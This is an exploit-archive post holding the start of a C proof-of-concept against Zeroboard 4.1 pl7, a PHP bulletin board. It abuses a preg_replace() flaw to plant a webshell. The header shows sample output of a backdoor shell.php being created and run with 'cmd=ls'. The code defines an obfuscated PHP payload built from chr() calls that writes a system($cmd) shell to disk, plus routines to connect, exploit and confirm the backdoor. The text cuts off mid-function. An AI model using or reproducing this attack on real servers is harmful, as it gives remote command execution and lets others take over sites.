zeroboard41-exec.txt
Posted on 04 September 2009
/* poc by kyoungchip,jang email : SpeeDr00t1004@gmail.com [*] the bug - http://www.xpressengine.com/15955761 Application - Zeroboard 4.1 pl7 Reference: - http://www.nzeo.com - Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada [*] Target - My test server $ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test - Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test - Target : http://xxx.xxx.xxx/zboard/bbs/shell.php?cmd=ls [+] xxx.xxx.xxx connecting ok! [+] Exploiting zeroboard start - [+] Exploiting success!! [*] Create Backdoor Start - [+] Create Backdoor success!! [*] Confirmming your backdoor php script - http://192.168.179.6/zeroboard/zb41pl7/bbs/data/shell.php is generated! [+] Exploiting success!! - http://192.168.179.6/zeroboard/bbs/data/shell.php?cmd=ls [+] Execute the websehll script */ #include <stdio.h> #include <stdarg.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netdb.h> #include <sys/types.h> #include <signal.h> #include <time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/select.h> #include <errno.h> #define BUFSIZE 4096 #define READSIZE 1500 #define EXPLOIT_CODE "*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1" void ParseZbHost(char *); void ConnectZboard(char *, unsigned short); void ExploitZboard(void); void ConfirmPHPScript(void); void CreateBackdoor(void); void StatusProcess(void); void Usage(char *); void OutputErr(char *, int); char *zb_host; char *zb_dir; char *zb_tid; unsigned short zb_port; int sockfd = -1; int reconn=0; char ReadBuf[READSIZE]; char WriteBuf[BUFSIZE]; char TempBuf[BUFSIZ]; char no[16]; int main(int argc, char *argv[]) { char *szArgv; switch( argc ) { case 1 : Usage(argv[0]); break; case 2 : zb_port = 80; //szArgv = "http://192.168.179.6/zeroboard/zb41pl7/bbs/zboard.php?id=test"; ParseZbHost( szArgv ); break; case 3: zb_port = atoi(argv[2]); ParseZbHost(argv[1]); break; default: break; }; ConnectZboard(zb_host, zb_port); ExploitZboard(); CreateBackdoor(); ConfirmPHPScript(); } void ParseZbHost( char *zbhost ) { char *psbuf; char *sptr=NULL; char *eptr=NULL; psbuf = ( char* )malloc( strlen( zbhost ) + 1 ); strcpy( psbuf, zbhost ); if( (sptr = strstr( psbuf , "http://" ) ) == NULL) OutputErr("http://host need ", 0); zb_host = sptr + 7; sptr = strchr(zb_host, '/'); sptr[0] = '